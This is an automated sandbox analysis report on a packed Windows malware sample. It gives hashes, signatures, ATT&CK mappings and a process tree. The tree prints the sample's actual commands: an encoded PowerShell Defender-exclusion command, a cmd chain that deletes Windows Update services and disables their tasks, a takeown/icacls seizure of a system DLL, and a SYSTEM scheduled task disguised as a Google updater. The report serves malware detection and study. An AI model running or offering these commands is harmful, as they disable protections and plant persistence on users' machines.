1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025

General

Target

1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
Size

7.1MB
MD5

322cf2f6a67420e4eb53f29263a639ba
SHA1

bc91f56c260ff4484f7fb0d33a3d351d3d812781
SHA256

1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025
SHA512

3e58b83f26950059901ad1cbb20a06351b7a815d17a3e65a0a84061b7d0d9af588a2685786c28642b1bb76575c81b272d10a1b1dede515b643b27ea52deadcc7

Score

10^/10

discovery evasion exploit themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
Drops file in Drivers directory 1 IoCs

Processes:

conhost.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1156 takeown.exe
1884 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

pid	process
1156	takeown.exe
1884	icacls.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

1156 takeown.exe
1884 icacls.exe

pid	process
1156	takeown.exe
1884	icacls.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/1984-54-0x0000000000400000-0x000000000106F000-memory.dmp	themida
behavioral1/memory/1984-55-0x0000000000400000-0x000000000106F000-memory.dmp	themida
behavioral1/memory/1984-57-0x0000000000400000-0x000000000106F000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe

pid process

1984 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe

pid	process
1984	1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe

Drops file in Program Files directory 2 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	conhost.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	conhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1692 sc.exe
984 sc.exe
1452 sc.exe
1892 sc.exe
1632 sc.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1712 schtasks.exe
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

612 reg.exe
1468 reg.exe
992 reg.exe
1116 reg.exe
1900 reg.exe
564 reg.exe
1488 reg.exe
1380 reg.exe
524 reg.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.execonhost.exe

pid process

1208 powershell.exe
1956 conhost.exe

pid	process
1692	sc.exe
984	sc.exe
1452	sc.exe
1892	sc.exe
1632	sc.exe

pid	process
1712	schtasks.exe

pid	process
612	reg.exe
1468	reg.exe
992	reg.exe
1116	reg.exe
1900	reg.exe
564	reg.exe
1488	reg.exe
1380	reg.exe
524	reg.exe

pid	process
1208	powershell.exe
1956	conhost.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowercfg.execonhost.exepowercfg.exepowercfg.exepowercfg.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeShutdownPrivilege	1616	powercfg.exe
Token: SeDebugPrivilege	1956	conhost.exe
Token: SeShutdownPrivilege	1912	powercfg.exe
Token: SeShutdownPrivilege	1992	powercfg.exe
Token: SeShutdownPrivilege	772	powercfg.exe
Token: SeTakeOwnershipPrivilege	1156	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 1984 wrote to memory of 1956	1984	1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe	conhost.exe
PID 1984 wrote to memory of 1956	1984	1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe	conhost.exe
PID 1984 wrote to memory of 1956	1984	1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe	conhost.exe
PID 1984 wrote to memory of 1956	1984	1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe	conhost.exe
PID 1956 wrote to memory of 1208	1956	conhost.exe	powershell.exe
PID 1956 wrote to memory of 1208	1956	conhost.exe	powershell.exe
PID 1956 wrote to memory of 1208	1956	conhost.exe	powershell.exe
PID 1956 wrote to memory of 1780	1956	conhost.exe	cmd.exe
PID 1956 wrote to memory of 1780	1956	conhost.exe	cmd.exe
PID 1956 wrote to memory of 1780	1956	conhost.exe	cmd.exe
PID 1956 wrote to memory of 1508	1956	conhost.exe	cmd.exe
PID 1956 wrote to memory of 1508	1956	conhost.exe	cmd.exe
PID 1956 wrote to memory of 1508	1956	conhost.exe	cmd.exe
PID 1780 wrote to memory of 1632	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 1632	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 1632	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 1692	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 1692	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 1692	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 984	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 984	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 984	1780	cmd.exe	sc.exe
PID 1508 wrote to memory of 1616	1508	cmd.exe	powercfg.exe
PID 1508 wrote to memory of 1616	1508	cmd.exe	powercfg.exe
PID 1508 wrote to memory of 1616	1508	cmd.exe	powercfg.exe
PID 1780 wrote to memory of 1452	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 1452	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 1452	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 1892	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 1892	1780	cmd.exe	sc.exe
PID 1780 wrote to memory of 1892	1780	cmd.exe	sc.exe
PID 1508 wrote to memory of 1912	1508	cmd.exe	powercfg.exe
PID 1508 wrote to memory of 1912	1508	cmd.exe	powercfg.exe
PID 1508 wrote to memory of 1912	1508	cmd.exe	powercfg.exe
PID 1508 wrote to memory of 1992	1508	cmd.exe	powercfg.exe
PID 1508 wrote to memory of 1992	1508	cmd.exe	powercfg.exe
PID 1508 wrote to memory of 1992	1508	cmd.exe	powercfg.exe
PID 1780 wrote to memory of 524	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 524	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 524	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 1488	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 1488	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 1488	1780	cmd.exe	reg.exe
PID 1508 wrote to memory of 772	1508	cmd.exe	powercfg.exe
PID 1508 wrote to memory of 772	1508	cmd.exe	powercfg.exe
PID 1508 wrote to memory of 772	1508	cmd.exe	powercfg.exe
PID 1780 wrote to memory of 564	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 564	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 564	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 612	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 612	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 612	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 1468	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 1468	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 1468	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 1156	1780	cmd.exe	takeown.exe
PID 1780 wrote to memory of 1156	1780	cmd.exe	takeown.exe
PID 1780 wrote to memory of 1156	1780	cmd.exe	takeown.exe
PID 1780 wrote to memory of 1884	1780	cmd.exe	icacls.exe
PID 1780 wrote to memory of 1884	1780	cmd.exe	icacls.exe
PID 1780 wrote to memory of 1884	1780	cmd.exe	icacls.exe
PID 1956 wrote to memory of 556	1956	conhost.exe	cmd.exe
PID 1956 wrote to memory of 556	1956	conhost.exe	cmd.exe
PID 1956 wrote to memory of 556	1956	conhost.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
"C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"
2⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBhAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZwBuACMAPgA="
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1632

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1692

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:984

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1452

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1892

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:524

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:1488

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:564

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:612

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:1468

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1884

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:992

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1380

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1116

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1900

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1200

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1748

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:940

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:1220

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:432

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1284

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1632

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
3⤵
PID:556

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
4⤵
- Creates scheduled task(s)
PID:1712

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
PID:1576

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:1908

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

2

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Virtualization/Sandbox Evasion

1

T1497

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Query Registry

2

T1012

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/432-99-0x0000000000000000-mapping.dmp

Download
memory/524-79-0x0000000000000000-mapping.dmp

Download
memory/556-87-0x0000000000000000-mapping.dmp

Download
memory/564-82-0x0000000000000000-mapping.dmp

Download
memory/612-83-0x0000000000000000-mapping.dmp

Download
memory/772-81-0x0000000000000000-mapping.dmp

Download
memory/940-97-0x0000000000000000-mapping.dmp

Download
memory/984-73-0x0000000000000000-mapping.dmp

Download
memory/992-91-0x0000000000000000-mapping.dmp

Download
memory/1116-93-0x0000000000000000-mapping.dmp

Download
memory/1156-85-0x0000000000000000-mapping.dmp

Download
memory/1200-95-0x0000000000000000-mapping.dmp

Download
memory/1208-67-0x0000000002604000-0x0000000002607000-memory.dmp

Filesize
12KB

Download
memory/1208-68-0x000000000260B000-0x000000000262A000-memory.dmp

Filesize
124KB

Download
memory/1208-66-0x0000000002604000-0x0000000002607000-memory.dmp

Filesize
12KB

Download
memory/1208-65-0x000007FEED7F0000-0x000007FEEE34D000-memory.dmp

Filesize
11.4MB

Download
memory/1208-62-0x0000000000000000-mapping.dmp

Download
memory/1220-98-0x0000000000000000-mapping.dmp

Download
memory/1284-100-0x0000000000000000-mapping.dmp

Download
memory/1380-92-0x0000000000000000-mapping.dmp

Download
memory/1452-75-0x0000000000000000-mapping.dmp

Download
memory/1468-84-0x0000000000000000-mapping.dmp

Download
memory/1488-80-0x0000000000000000-mapping.dmp

Download
memory/1508-70-0x0000000000000000-mapping.dmp

Download
memory/1576-88-0x0000000000000000-mapping.dmp

Download
memory/1616-74-0x0000000000000000-mapping.dmp

Download
memory/1632-71-0x0000000000000000-mapping.dmp

Download
memory/1632-101-0x0000000000000000-mapping.dmp

Download
memory/1692-72-0x0000000000000000-mapping.dmp

Download
memory/1712-89-0x0000000000000000-mapping.dmp

Download
memory/1748-96-0x0000000000000000-mapping.dmp

Download
memory/1780-69-0x0000000000000000-mapping.dmp

Download
memory/1884-86-0x0000000000000000-mapping.dmp

Download
memory/1892-76-0x0000000000000000-mapping.dmp

Download
memory/1900-94-0x0000000000000000-mapping.dmp

Download
memory/1908-90-0x0000000000000000-mapping.dmp

Download
memory/1912-77-0x0000000000000000-mapping.dmp

Download
memory/1956-61-0x000007FEFC331000-0x000007FEFC333000-memory.dmp

Filesize
8KB

Download
memory/1956-60-0x000000001B820000-0x000000001BC3E000-memory.dmp

Filesize
4.1MB

Download
memory/1956-59-0x0000000000230000-0x000000000064E000-memory.dmp

Filesize
4.1MB

Download
memory/1984-54-0x0000000000400000-0x000000000106F000-memory.dmp

Filesize
12.4MB

Download
memory/1984-58-0x0000000077910000-0x0000000077AB9000-memory.dmp

Filesize
1.7MB

Download
memory/1984-57-0x0000000000400000-0x000000000106F000-memory.dmp

Filesize
12.4MB

Download
memory/1984-56-0x0000000077910000-0x0000000077AB9000-memory.dmp

Filesize
1.7MB

Download
memory/1984-55-0x0000000000400000-0x000000000106F000-memory.dmp

Filesize
12.4MB

Download
memory/1992-78-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads